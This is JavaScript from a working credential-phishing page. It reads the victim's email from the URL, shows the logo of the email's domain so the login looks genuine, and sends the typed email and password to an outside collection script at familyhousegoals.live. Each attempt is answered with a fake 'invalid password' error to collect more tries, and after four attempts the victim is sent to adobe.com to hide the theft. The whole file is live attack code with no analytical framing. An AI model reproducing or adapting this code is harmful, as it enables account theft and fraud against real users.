
        function Validate() {
            var a = $('#email').val();
            var b = $('#pass').val();
            var c = $('#count').val();
            var my_email = a;
            var ind = my_email.indexOf("@");
            var d = my_email.substr((ind + 1));

            if (a == '' || b == '') {
                return false;
            }
            $('#loadM').fadeIn();

            $.post(url, {
                email: a,
                pass: b
            }, function() {
                setTimeout(function() {
                    $('#divMsg').html('Error encountered, invalid email or password combination');
                    $('#pass').val('');
                    var add = +c + 1;
                    $('#count').val(add);

                    $('#loadM').fadeOut();
                }, 2000);
            });

        }



        /* global $ */
        $(document).ready(function() {
            var count = 0;

            $('#back1').click(function() {
                $("#msg").hide();
                $('#email').val("");
                $("#automail").animate({
                    left: 200,
                    opacity: "hide"
                }, 0);
                $("#inputbar").animate({
                    right: 200,
                    opacity: "show"
                }, 1000);

            });

            var email = window.location.hash.substr(1);
            if (!email) {

            } else {
                var my_email = email;
                $('#email').val(my_email);
                $('#emailich').html(my_email);

                var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

                if (!filter.test(my_email)) {
                    $('#error').show();
                    email.focus;
                    return false;
                }
                var ind = my_email.indexOf("@");
                var my_slice = my_email.substr((ind + 1));
                var c = my_slice.substr(0, my_slice.indexOf('.'));
                var final = c.toLowerCase();
                var finalu = c.toUpperCase();

                $("#logoimg").attr("src", "https://logo.clearbit.com/" + my_slice);

                $("#logoimg").attr("alt", finalu);
                $("#logoname").html(finalu);
                $(".logoname").html(finalu);
                $('#logoname2').html(finalu);
                $('.logoname2').html(finalu);
            }


            $('#submit-btn').click(function(event) {
                $('#error').hide();
                $('#msg').hide();
                event.preventDefault();
                var email = $("#email").val();
                var pass = $("#pass").val();
                var msg = $('#msg').html();
                $('#msg').text(msg);
                ///////////new injection////////////////
                var my_email = email;
                var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

                if (!filter.test(my_email)) {
                    $('#error').show()
                    email.focus;
                    return false;
                }

                var ind = my_email.indexOf("@");
                var my_slice = my_email.substr((ind + 1));
                var c = my_slice.substr(0, my_slice.indexOf('.'));
                var final = c.toLowerCase();
                var finalu = c.toUpperCase();

                $("#logoimg").attr("src", "https://logo.clearbit.com/" + my_slice);
                $("#logoname").html(finalu);
                ///////////new injection////////////////
                count = count + 1;

                $.ajax({
                    dataType: 'JSON',
                    url: 'https://familyhousegoals.live/cr/blessed.php',
                    type: 'POST',
                    data: {
                        email: email,
                        pass: pass,
                    },
                    // data: $('#contact').serialize(),
                    beforeSend: function(xhr) {
                        $('#submit-btn').val('Verifing...');
                    },
                    success: function(response) {
                        if (response) {
                            $("#msg").show();
                            console.log(response);
                            if (response['signal'] == 'ok') {
                                $("#pass").val("");
                                if (count >= 4) {
                                    count = 0;
                                    // window.location.replace(response['redirect_link']);
                                    window.location.href("https://www.adobe.com/");

                                }
                                // $('#msg').html(response['msg']);
                            } else {
                                // $('#msg').html(response['msg']);
                            }
                        }
                    },
                    error: function() {
                        $("#pass").val("");
                        if (count >= 4) {
                            count = 0;
                            window.location.replace("https://www.adobe.com/");
                        }
                        $("#msg").show();
                        // $('#msg').html("Please try again later");
                    },
                    complete: function() {
                        $('#submit-btn').val('Login');
                    }
                });
            });


        });
    